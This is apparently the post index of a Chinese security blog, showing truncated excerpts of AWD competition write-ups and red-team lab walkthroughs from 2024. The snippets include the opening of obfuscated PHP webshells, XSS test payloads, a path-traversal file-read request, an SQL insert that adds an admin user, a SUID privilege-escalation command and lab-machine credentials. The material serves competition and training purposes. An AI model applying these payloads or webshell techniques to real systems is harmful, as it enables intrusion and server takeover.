睿抗机器人网络安全赛道AWD WP xhcms2漏洞一:免杀马1位置:/var/www/html/public/uploads/admin/202412/this_is_big.php 12345678<?php$a = substr_replace("xxser","syste",-3);$aa = array('',$a);$b = $aa[1].chr( 2024-12-31
ATT—CK红队评估实战内网靶场4 环境搭建12345kali: 192.168.1.128ubuntu:ubuntu 192.168.138.129 192.168.1.132域成员机器douser:Dotest123 192.168.138.128administrator:Test2008 192.168.138.130 ubuntu启动所有docker服务 1sudo docker star 2024-11-14
CFS三层靶机 环境搭建密码均为:teamssix.com,拓扑如下 12345Target1_CentOS7宝塔后台登陆地址及密码:地址:http://192.168.1.129:8888/a768f109/账号:eaj3yhsl密码:41bb8fee 添加自动分配ip的80端口,他这里的网站是宝塔搭建的,绑定的是原靶机的ip和端口,靶机又没固定ip,所以我们能访问ip的8888端口,不能访问80端口 12 2024-11-13
ATT—CK红队评估实战内网靶场3 环境搭建靶机解压打开都是挂起状态,直接打开即可 网络拓扑如下 信息收集nmap扫描 访问网站,发现是joomla,joomscan扫描 1joomscan -u http://192.168.1.110 查看配置文件,得到数据库账户密码 连上,找到数据库里的账户密码存放文件 搜索joomla管理员恢复密码,找到密码存放规则 sql执行添加管理员用户 12INSERT INTO `am 2024-11-07
ATT—CK红队评估实战内网靶场2 环境搭建靶机通用密码: 1qaz@WSX 管理员账号密码:Administrator/1qaz@WSX WEB:10.10.10.80 192.168.111.80 PC:10.10.10.201 DC:10.10.10.10 web登录de1ay/1qaz@WSX,启动C:\Oracle\Middleware\user_projects\domains\base_domain\bin\s 2024-11-05
XSS_labs_writeup level 11?name=<script>alert(1)</script> name参数未过滤直接传入html代码 level 212" onclick="alert(1)"> <script>alert()</script> <" 对keyword执行了html实体转码,因此思路是 2024-09-05
CISCN华中2024AWD WP gaatitrack漏洞1:免杀混淆马1<?php goto PFBx1; CEKfL: $WFOjN = substr((string) $tCGqQ->getName(), 1, 3) . substr((string) $tCGqQ->getName(), 8); goto i8J9H; PFBx1: class ssysgametem { public $u0y 2024-07-29
长城杯 AWD funadmin漏洞1:/app/api/controller/v1/Token.php存在一句话木马 漏洞2:任意文件读取app/frontend/controller/Ajax.php存在文件读取 1/frontend/Ajax/getfile?file=../../../../../../flag 漏洞3:phtml文件上传后台用户头像抓包修改可上传phtml文件 漏洞4:后台任意文件 2024-07-17
AWD搭建 本次搭建awd靶机为ciscn华中awd靶机 game知识点:栈溢出,格式化字符串,SUID提权 比赛时这个靶机pwn工作目录放在了根目录,找个pwn靶机环境( ),安装好ssh,并设置ctf用户登录,再给find命令SUID权限 1chmod u+s find 比赛靶机pwn工作目录放在了根目录,用户目录又存在usr目录,没看懂 gaatitrack环境:ubuntu18.04,apache2, 2024-06-29